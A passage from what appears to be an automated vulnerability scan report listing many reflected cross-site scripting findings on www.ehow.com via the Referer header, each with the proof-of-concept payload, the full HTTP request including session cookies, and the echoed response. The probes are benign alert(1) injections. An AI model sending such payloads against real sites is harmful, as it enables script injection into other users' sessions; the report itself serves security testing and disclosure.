<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Design & Decorating - How To Information | e
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "f3f72</script><script>alert(1)</script>a019290626d";

       </script>
...[SNIP]...

4.618. http://www.ehow.com/home-maintenance-and-repair/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-maintenance-and-repair/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4071d</script><script>alert(1)</script>3ff02b2dbf8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /home-maintenance-and-repair/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4071d</script><script>alert(1)</script>3ff02b2dbf8

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73460

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Maintenance & Repair - How To Information |
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "4071d</script><script>alert(1)</script>3ff02b2dbf8";

       </script>
...[SNIP]...

4.619. http://www.ehow.com/home-safety-and-household-tips/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-safety-and-household-tips/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee49f</script><script>alert(1)</script>99509508ba4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /home-safety-and-household-tips/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ee49f</script><script>alert(1)</script>99509508ba4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70626

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Safety & Household Tips - How To Information
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ee49f</script><script>alert(1)</script>99509508ba4";

       </script>
...[SNIP]...

4.620. http://www.ehow.com/home-security-alarm/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-security-alarm/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f883b</script><script>alert(1)</script>f66a86dc852 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /home-security-alarm/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f883b</script><script>alert(1)</script>f66a86dc852

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60630

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Security Alarm - eHow.com</title>
       <meta c
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "f883b</script><script>alert(1)</script>f66a86dc852";

       </script>
...[SNIP]...

4.621. http://www.ehow.com/housekeeping/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/housekeeping/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 674ae</script><script>alert(1)</script>7e706d5e99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /housekeeping/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=674ae</script><script>alert(1)</script>7e706d5e99

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71853

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Housekeeping - How To Information | eHow.com</tit
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "674ae</script><script>alert(1)</script>7e706d5e99";

       </script>
...[SNIP]...

4.622. http://www.ehow.com/how-to.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how-to.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca85e</script><script>alert(1)</script>47ffba28361 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how-to.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ca85e</script><script>alert(1)</script>47ffba28361

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27515

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How To Directory | eHow.com</title>
       <meta char
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ca85e</script><script>alert(1)</script>47ffba28361";

       </script>
...[SNIP]...

4.623. http://www.ehow.com/how_13299_know-someone-lying.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_13299_know-someone-lying.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 820fe</script><script>alert(1)</script>4ab6b57dae1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_13299_know-someone-lying.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=820fe</script><script>alert(1)</script>4ab6b57dae1

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 81521

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Know if Someone Is Lying | eHow.com</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "820fe</script><script>alert(1)</script>4ab6b57dae1";

       </script>
...[SNIP]...

4.624. http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2053743_make-crock-pot-pork-roast.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65c19</script><script>alert(1)</script>ba2639b56db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_2053743_make-crock-pot-pork-roast.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=65c19</script><script>alert(1)</script>ba2639b56db

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75840

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Crock Pot Pork Roast | eHow.com</ti
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "65c19</script><script>alert(1)</script>ba2639b56db";

       </script>
...[SNIP]...

4.625. http://www.ehow.com/how_2077554_repair-cracks-dashboard.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2077554_repair-cracks-dashboard.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32d36</script><script>alert(1)</script>a207535244d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_2077554_repair-cracks-dashboard.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=32d36</script><script>alert(1)</script>a207535244d

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75147

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Repair Cracks in a Dashboard | eHow.com</t
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "32d36</script><script>alert(1)</script>a207535244d";

       </script>
...[SNIP]...

4.626. http://www.ehow.com/how_2113353_end-sibling-feuds.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2113353_end-sibling-feuds.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0a9b</script><script>alert(1)</script>4d2f73e4a4f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_2113353_end-sibling-feuds.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c0a9b</script><script>alert(1)</script>4d2f73e4a4f

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87612

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to End Sibling Feuds | eHow.com</title>
       <m
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "c0a9b</script><script>alert(1)</script>4d2f73e4a4f";

       </script>
...[SNIP]...

4.627. http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2304056_cut-shirt-make-cuter.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4913</script><script>alert(1)</script>e5a0ba7fb0e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_2304056_cut-shirt-make-cuter.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b4913</script><script>alert(1)</script>e5a0ba7fb0e

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76882

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Cut a T Shirt To Make It Cuter | eHow.com<
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "b4913</script><script>alert(1)</script>e5a0ba7fb0e";

       </script>
...[SNIP]...

4.628. http://www.ehow.com/how_3815_minutes-business-meeting.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_3815_minutes-business-meeting.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c400e</script><script>alert(1)</script>9ed15557f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_3815_minutes-business-meeting.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c400e</script><script>alert(1)</script>9ed15557f52

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91165

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Take Minutes at a Business Meeting | eHow.
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "c400e</script><script>alert(1)</script>9ed15557f52";

       </script>
...[SNIP]...

4.629. http://www.ehow.com/how_4469163_edit-pdf-document.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4469163_edit-pdf-document.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52b20</script><script>alert(1)</script>75e36263ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_4469163_edit-pdf-document.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=52b20</script><script>alert(1)</script>75e36263ac

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78825

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Edit a PDF Document | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "52b20</script><script>alert(1)</script>75e36263ac";

       </script>
...[SNIP]...

4.630. http://www.ehow.com/how_4474239_make-graph-using-excel.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4474239_make-graph-using-excel.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c68</script><script>alert(1)</script>58bb3213787 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_4474239_make-graph-using-excel.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f9c68</script><script>alert(1)</script>58bb3213787

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94464

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Graph Using Excel | eHow.com</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "f9c68</script><script>alert(1)</script>58bb3213787";

       </script>
...[SNIP]...

4.631. http://www.ehow.com/how_4924781_open-pub-file-mac.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4924781_open-pub-file-mac.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7370</script><script>alert(1)</script>1fdfe884e13 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_4924781_open-pub-file-mac.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
